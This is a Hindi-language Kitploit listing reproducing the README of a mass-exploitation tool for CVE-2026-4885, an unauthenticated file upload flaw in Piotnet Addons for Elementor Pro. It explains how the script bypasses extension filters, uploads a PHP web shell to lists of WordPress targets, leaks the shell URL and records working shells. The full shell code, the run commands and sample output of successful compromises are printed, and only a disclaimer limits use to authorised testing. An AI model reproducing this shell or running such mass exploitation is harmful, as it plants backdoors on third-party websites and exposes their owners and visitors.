Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-4885 — Piotnet Addons for Elementor Pro <= 7.1.70 - फ़ॉर्म फ़ाइल अपलोड के माध्यम से अप्रमाणित मनमाना फ़ाइल अपलोड | Kitploit
उपकरण/GitHubGitHub/jenderal92/cve-2026-4885
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHubjenderal92/cve-2026-4885

CVE-2026-4885

Piotnet Addons for Elementor Pro <= 7.1.70 - फ़ॉर्म फ़ाइल अपलोड के माध्यम से अप्रमाणित मनमाना फ़ाइल अपलोड

रिपॉजिटरी देखें
2 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-4885 – Piotnet Addons for Elementor Pro बड़े पैमाने पर शोषण

अप्रमाणित मनमाना फ़ाइल अपलोड जो Piotnet Addons for Elementor Pro ≤ 7.1.70 में दूरस्थ कोड निष्पादन (RCE) की ओर ले जाता है।

यह उपकरण बड़े पैमाने पर शोषण के लिए डिज़ाइन किया गया है – इसे लक्ष्यों की एक सूची दें, और यह स्वचालित रूप से:

  • प्लगइन संस्करण का पता लगाएं (या यदि संपत्तियाँ मिलती हैं तो कमजोर मानें)
  • post_id, form_id, और सही अपलोड फ़ील्ड नाम निकालने के लिए उन्नत टोही करें
  • कमजोर फ़िल्टर को बायपास करने के लिए कई PHP एक्सटेंशन आज़माएं (.phtml, .php3, .php4, .phps, .pht, .php2)
  • एक GIF89a‑हेडर PHP शेल अपलोड करें (अंतर्निहित, किसी बाहरी फ़ाइल की आवश्यकता नहीं)
  • pafe_export_database के माध्यम से अपलोड किए गए शेल URL को लीक करें
  • शेल निष्पादन सत्यापित करें (Logic_Internet स्ट्रिंग खोजें) और URL को shells.txt में सहेजें

⚠️ अस्वीकरण
यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण के लिए है।
उन प्रणालियों के विरुद्ध अनधिकृत उपयोग जिनके आप मालिक नहीं हैं, अवैध है।

अधिक अस्वीकरण आप Jenderal92 के कवर पर अस्वीकरण देख सकते हैं। आप इसे यहाँ !!! देख सकते हैं।


विशेषताएँ

  • Python 2.7 संगत (यदि आप print/input समायोजित करते हैं तो Python 3 के साथ भी काम करता है)
  • मल्टी‑थ्रेडेड – एक साथ 20 लक्ष्यों तक स्कैन और शोषण करें
  • स्मार्ट फॉर्म डिटेक्शन – Piotnet‑विशिष्ट HTML विशेषताओं को पार्स करता है (data-pafe-form-builder-field-name, data-elementor-id, आदि)
  • कोई बाहरी शेल फ़ाइल नहीं – PHP पेलोड स्क्रिप्ट में एम्बेडेड है
  • स्वचालित URL योजना – यदि गायब है तो https:// जोड़ता है
  • विस्तृत पथ सूची – इसमें 22 सामान्य फॉर्म URL शामिल हैं (/contact, /apply, /quote, /book-appointment, …)
  • लीक पैटर्न – wp-content/uploads/piotnet-addons-for-elementor/ और सीधे रूट पथ दोनों से मेल खाता है

आवश्यकताएँ

  • Python 2.7 (या Python 3 मामूली बदलावों के साथ)
  • requests लाइब्रेरी
root@kitploit:~
pip install requests

स्थापना

root@kitploit:~
git clone https://github.com/Jenderal92/CVE-2026-4885.git
cd CVE-2026-4885

उपयोग

  1. एक लक्ष्य फ़ाइल तैयार करें

targets.txt (या कोई भी नाम) नामक एक फ़ाइल बनाएं जिसमें प्रति पंक्ति एक URL हो:

root@kitploit:~
https://example1.com
example2.com
http://vulnerable-site.org
  1. शोषण चलाएँ
root@kitploit:~
python2 CVE-2026-4885.py targets.txt

स्क्रिप्ट यह करेगी:

· प्रत्येक लक्ष्य के लिए प्रगति दिखाएगा · सफल शेल URL को shells.txt में सहेजेगा

उदाहरण आउटपुट

root@kitploit:~
[*] Loaded built-in shell (598 bytes)
[*] scanning 25 pages...
[+] found form at https://target.com/contact | post_id=13 form_id=fa2c60e field=file
[*] post_id=13 form_id=fa2c60e field=file
[*] trying .phtml
[+] uploaded .phtml
[+] shell URL: https://target.com/wp-content/uploads/piotnet-addons-for-elementor/xxx-6a11e162a6099.phtml
[+] SHELL UPLOADED -> https://target.com/wp-content/uploads/piotnet-addons-for-elementor/xxx-6a11e162a6099.phtml

कमांड लाइन विकल्प (स्क्रिप्ट में अनुकूलन योग्य)

आप स्क्रिप्ट के शीर्ष को संपादित करके इन्हें बदल सकते हैं।


शेल पेलोड

अंतर्निहित शेल है:

root@kitploit:~
GIF89a;
<?php
echo 'Logic_Internet'.'<br>'.'Uname:'.php_uname().'<br>'.$cwd = getcwd();
Echo '<center>  <form method="post" target="_self" enctype="multipart/form-data">  <input type="file" size="20" name="uploads" /> <input type="submit" value="upload" />  </form>  </center>'.'<br>';
if (!empty ($_FILES['uploads'])) {
    move_uploaded_file($_FILES['uploads']['tmp_name'],$_FILES['uploads']['name']);
    Echo "<script>alert('upload Done');</script><b>Uploaded !!!</b><br>name : ".$_FILES['uploads']['name']."<br>size : ".$_FILES['uploads']['size']."<br>type : ".$_FILES['uploads']['type'];
}
?>

· सर्वर जानकारी, वर्तमान कार्यशील निर्देशिका और एक फ़ाइल अपलोड फॉर्म प्रदर्शित करता है। · इसे किसी भी अन्य PHP कोड से बदला जा सकता है (स्क्रिप्ट में केवल SHELL_CODE बदलें)।


यह कैसे काम करता है

  1. संस्करण पहचान · प्लगइन संपत्तियों में ?ver= के लिए होमपेज खोजता है। · ज्ञात CSS/JS फ़ाइलों के अस्तित्व की जाँच करने पर वापस आता है।

  2. टोही · सामान्य फॉर्म पृष्ठों और होमपेज पर मिले सभी आंतरिक लिंक को क्रॉल करता है। · Piotnet‑विशिष्ट HTML विशेषताओं से post_id, form_id, और सही फ़ाइल अपलोड फ़ील्ड नाम निकालता है।

  3. अपलोड · wp-admin/admin-ajax.php?action=pafe_ajax_form_builder पर एक मल्टीपार्ट POST अनुरोध भेजता है। · एक JSON पेलोड का उपयोग करता है जो प्लगइन के अपलोड तंत्र का अनुकरण करता है। · EXT_LIST में सभी एक्सटेंशन तब तक आज़माता है जब तक एक सफल न हो जाए।

  4. लीक · pafe_export_database का अनुरोध करता है जो अपलोड की गई फ़ाइल का पूरा URL वाला CSV लौटाता है। · एक regex पैटर्न का उपयोग करके URL को पार्स करता है जो xxx-{random}.ext से मेल खाता है।

  5. सत्यापन · लीक किए गए URL पर जाता है। · Logic_Internet स्ट्रिंग की उपस्थिति की जाँच करता है। · सफलता पर URL को shells.txt में सहेजता है।


समस्या निवारण

Windows पर UnicodeEncodeError

स्क्रिप्ट में पहले से ही एक safe_unicode() फ़ंक्शन शामिल है जो गैर‑ASCII वर्णों को संभालता है। यदि आप अभी भी त्रुटियाँ देखते हैं, तो सुनिश्चित करें कि आपका टर्मिनल UTF‑8 का समर्थन करता है:

root@kitploit:~
chcp 65001

कोई फॉर्म नहीं मिला / सभी एक्सटेंशन विफल

· लक्ष्य पैच किया गया हो सकता है या Piotnet Addons का उपयोग नहीं कर रहा हो। · TIMEOUT या MAX_THREADS बढ़ाने का प्रयास करें। · मैन्युअल रूप से सत्यापित करें कि प्लगइन वास्तव में स्थापित है।

लीक विफल होता है लेकिन अपलोड सफल हुआ

· pafe_export_database एंडपॉइंट अक्षम या सुरक्षित हो सकता है। · यह देखने के लिए ब्राउज़र में मैन्युअल रूप से /wp-admin/admin-ajax.php?action=pafe_export_database तक पहुँचने का प्रयास करें कि यह सुलभ है या नहीं।


कानूनी और नैतिक उपयोग

· इस उपकरण का उपयोग केवल उन प्रणालियों पर करें जिनके परीक्षण के लिए आपके पास लिखित अनुमति है। · लेखक किसी भी दुरुपयोग या हुई क्षति के लिए जिम्मेदार नहीं है। · सभी लागू कानूनों का सम्मान करें।

टूल डाउनलोड करें
चरविवरणडिफ़ॉल्ट
TIMEOUTHTTP अनुरोध टाइमआउट10 सेकंड
MAX_THREADSसमवर्ती थ्रेड्स की संख्या20
OUTPUT_FILEसफल शेल URL कहाँ सहेजेंshells.txt
EXT_LISTआज़माने के लिए फ़ाइल एक्सटेंशन.phtml, .php3, .php4, .phps, .pht, .php2